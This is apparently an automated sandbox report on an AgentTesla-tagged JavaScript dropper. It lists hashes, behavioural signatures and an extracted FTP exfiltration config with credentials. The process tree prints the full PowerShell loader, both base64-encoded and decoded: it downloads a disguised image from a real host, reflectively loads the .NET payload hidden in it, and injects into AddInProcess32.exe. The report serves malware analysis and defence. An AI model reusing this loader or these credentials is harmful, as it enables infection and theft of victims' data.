Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
25-04-2024 03:42
Static task
static1
Behavioral task
behavioral1
Sample
comprobante_9887887.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
comprobante_9887887.js
Resource
win10v2004-20240412-en
General
-
Target
comprobante_9887887.js
-
Size
5KB
-
MD5
39f9206f83d0141caec19300d528fd57
-
SHA1
c78e336bd902973b64108eb003aeb0a92e48bf26
-
SHA256
a09d8c7cd5db2add2d2aba1810a14afb1f602dd81db92e6f4889d93dfaf455f0
-
SHA512
b4670af49b60cde81064d4971498b84d38f94b35b49b01c97573eb3ed73870cf0afbb0496f174addec58f3ef435cbf78dd4a20a09f930d44196f72142e9a5097
-
SSDEEP
96:QcbRUp/NhXhqan4JvvommR39pfh24meHBhmeRqmeRdmeRbmeRoBgmeFFcKRUpl9h:z6rxqqpz+D60S
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.fosna.net - Port:
21 - Username:
[email protected] - Password:
=A+N^@~c]~#I
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 5 IoCs
Processes:
wscript.exepowershell.exeflow pid process 3 4388 wscript.exe 5 4388 wscript.exe 8 4388 wscript.exe 14 4892 powershell.exe 30 4892 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\International\Geo\Nation wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 56 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4892 set thread context of 4684 4892 powershell.exe AddInProcess32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exeAddInProcess32.exepid process 1096 powershell.exe 1096 powershell.exe 4892 powershell.exe 4892 powershell.exe 4684 AddInProcess32.exe 4684 AddInProcess32.exe 4684 AddInProcess32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeAddInProcess32.exedescription pid process Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 4684 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
wscript.exepowershell.exepowershell.exedescription pid process target process PID 4388 wrote to memory of 1096 4388 wscript.exe powershell.exe PID 4388 wrote to memory of 1096 4388 wscript.exe powershell.exe PID 1096 wrote to memory of 4892 1096 powershell.exe powershell.exe PID 1096 wrote to memory of 4892 1096 powershell.exe powershell.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe PID 4892 wrote to memory of 4684 4892 powershell.exe AddInProcess32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\comprobante_9887887.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc3My84MTIvb3JpZ2luYWwvanMuanBnPzE3MTM4ODI3NzgnLCAnaHR0cHM6Ly91cGxvYWRkZWltYWdlbnMuY29tLmJyL2ltYWdlcy8wMDQvNzczLzgxMi9vcmlnaW5hbC9qcy5qcGc/MTcxMzg4Mjc3OCcpOyAkaW1hZ2VCeXRlcyA9IERvd25sb2FkRGF0YUZyb21MaW5rcyAkbGlua3M7IGlmICgkaW1hZ2VCeXRlcyAtbmUgJG51bGwpIHsgJGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbWFnZUJ5dGVzKTsgJHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzsgJGVuZEZsYWcgPSAnPDxCQVNFNjRfRU5EPj4nOyAkc3RhcnRJbmRleCA9ICRpbWFnZVRleHQuSW5kZXhPZigkc3RhcnRGbGFnKTsgJGVuZEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRlbmRGbGFnKTsgaWYgKCRzdGFydEluZGV4IC1nZSAwIC1hbmQgJGVuZEluZGV4IC1ndCAkc3RhcnRJbmRleCkgeyAkc3RhcnRJbmRleCArPSAkc3RhcnRGbGFnLkxlbmd0aDsgJGJhc2U2NExlbmd0aCA9ICRlbmRJbmRleCAtICRzdGFydEluZGV4OyAkYmFzZTY0Q29tbWFuZCA9ICRpbWFnZVRleHQuU3Vic3RyaW5nKCRzdGFydEluZGV4LCAkYmFzZTY0TGVuZ3RoKTsgJGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGJhc2U2NENvbW1hbmQpOyAkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjb21tYW5kQnl0ZXMpOyAkdHlwZSA9ICRsb2FkZWRBc3NlbWJseS5HZXRUeXBlKCdQUk9KRVRPQVVUT01BQ0FPLlZCLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LjQ0NDQ2ZXphYi83Ny4wNi41OS4zMi8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c20ac38ae3022e305b8752804aadf486
SHA14c144d6cfafb5c37ab4810ff3c1744df81493cdb
SHA25603cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
SHA512c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3utb3uc.gfd.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1096-19-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmpFilesize
10.8MB
-
memory/1096-20-0x0000021E05C60000-0x0000021E05C70000-memory.dmpFilesize
64KB
-
memory/1096-21-0x0000021E05C60000-0x0000021E05C70000-memory.dmpFilesize
64KB
-
memory/1096-9-0x0000021E05CA0000-0x0000021E05CC2000-memory.dmpFilesize
136KB
-
memory/1096-41-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmpFilesize
10.8MB
-
memory/4684-44-0x00000000056C0000-0x00000000056D0000-memory.dmpFilesize
64KB
-
memory/4684-47-0x0000000006A60000-0x0000000006AF2000-memory.dmpFilesize
584KB
-
memory/4684-34-0x0000000000400000-0x0000000000442000-memory.dmpFilesize
264KB
-
memory/4684-50-0x00000000056C0000-0x00000000056D0000-memory.dmpFilesize
64KB
-
memory/4684-49-0x0000000074E60000-0x0000000075610000-memory.dmpFilesize
7.7MB
-
memory/4684-42-0x0000000074E60000-0x0000000075610000-memory.dmpFilesize
7.7MB
-
memory/4684-43-0x0000000005C80000-0x0000000006224000-memory.dmpFilesize
5.6MB
-
memory/4684-48-0x0000000006A00000-0x0000000006A0A000-memory.dmpFilesize
40KB
-
memory/4684-45-0x00000000056D0000-0x0000000005736000-memory.dmpFilesize
408KB
-
memory/4684-46-0x0000000006970000-0x00000000069C0000-memory.dmpFilesize
320KB
-
memory/4892-23-0x000002655D620000-0x000002655D630000-memory.dmpFilesize
64KB
-
memory/4892-22-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmpFilesize
10.8MB
-
memory/4892-37-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmpFilesize
10.8MB
-
memory/4892-33-0x0000026520000000-0x00000265202C0000-memory.dmpFilesize
2.8MB